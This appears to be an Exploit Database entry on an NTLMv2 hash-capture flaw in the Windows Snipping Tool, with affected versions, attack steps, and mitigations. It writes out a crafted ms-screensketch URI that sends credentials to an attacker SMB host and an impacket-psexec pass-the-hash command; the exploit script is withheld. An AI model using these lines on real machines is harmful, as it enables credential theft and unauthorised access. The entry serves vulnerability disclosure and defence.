[local] Windows Snipping Tool - NTLMv2 Hash Hijack

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Windows Snipping Tool - NTLMv2 Hash Hijack EDB-ID: 52567 CVE: 2026-33829 EDB Verified: Author: NU11SECUR1TY Type: LOCAL Exploit:   /   Platform: WINDOWS Date: 2026-05-15 Vulnerable App: # Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack # Date: 2026-04-22 # Exploit Author: nu11secur1ty # Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398 # Vendor Homepage: https://www.microsoft.com # Software Link: Built-in Windows Snipping Tool # Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch) # Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1 # CVE: CVE-2026-33829 # Attack Type: Remote / Network-based # Impact: Credential Theft (NTLMv2 Hash) / Pass-the-Hash # CVSS Score: 4.3 (Medium) but HIGH impact in practice ## Vulnerable Systems - Windows 10 (all versions before April 14, 2026 patch) - Windows 11 (all versions before April 14, 2026 patch) - Windows Server 2012, 2016, 2019, 2022, 2025 (before April 14, 2026 patch) ## Description A vulnerability in Windows Snipping Tool (CVE-2026-33829) allows attackers to force NTLMv2 authentication to a remote SMB server via crafted ms-screensketch:edit URI. When a victim clicks a malicious link and approves the "Open Snipping Tool" prompt, Windows automatically sends the user's NTLMv2 hash to the attacker-controlled server. This exploit extends beyond the original PoC by also harvesting HTTP NTLM hashes (via WPAD), LLMNR, and MDNS poisoning - capturing MULTIPLE valid hashes from a SINGLE click. Captured hashes can be used for Pass-the-Hash attacks or cracked with Hashcat. ## Exploit Features (nu11secur1ty edition) - ✅ Snipping Tool NTLM hash capture (original vector) - ✅ Automatic HTTP NTLM authentication capture (additional vector) - ✅ WPAD poisoning (automatic proxy config) - ✅ LLMNR/MDNS poisoning (fallback vectors) - ✅ Multi-harvest - captures multiple hashes from one click - ✅ One-command execution (sudo python3 exploit.py) - ✅ Auto-detects terminal and opens Responder in new window - ✅ Built-in HTTP server for HTML delivery ## Proof of Concept **Video Demonstration (Patreon Exclusive):** https://www.patreon.com/posts/cve-2026-33829-156243398 1. Run exploit on attacker machine (Kali Linux): sudo python3 CVE-2026-33829-NTLMv2-Hash-Hijack.py 2. Victim (Windows 11) opens the malicious URL: http://<ATTACKER_IP>/exploit.html 3. Victim clicks the button and approves "Open Snipping Tool" 4. Attacker captures NTLMv2 hash(es): [HTTP] NTLMv2 Username : \Hacked [HTTP] NTLMv2 Hash : Hacked:::157e1f851f7c17e7:16D87BC0AD284FB6... 5. Attacker performs Pass-the-Hash to gain access: impacket-psexec -hashes :<HASH> Hacked@<VICTIM_IP> ## Attack Vector ms-screensketch:edit?filePath=\\<ATTACKER_IP>\test\evil.png ## Requirements Attacker: Kali Linux (or any Linux with Python3, impacket, responder) Victim: Windows 10/11 with Snipping Tool (unpatched) ## Mitigations - Apply Microsoft patch from April 14, 2026 - Block outbound SMB traffic (port 445) - Disable NTLMv1 and restrict NTLMv2 via GPO - Educate users not to click "Open Snipping Tool" prompts from untrusted sources ## References - https://cybersecuritynews.com/windows-snipping-tool-vulnerability/ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829 - https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829 ## Exploit Code (NFO) The exploit will not be published for security reasons! For more information, please get in touch with me! -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services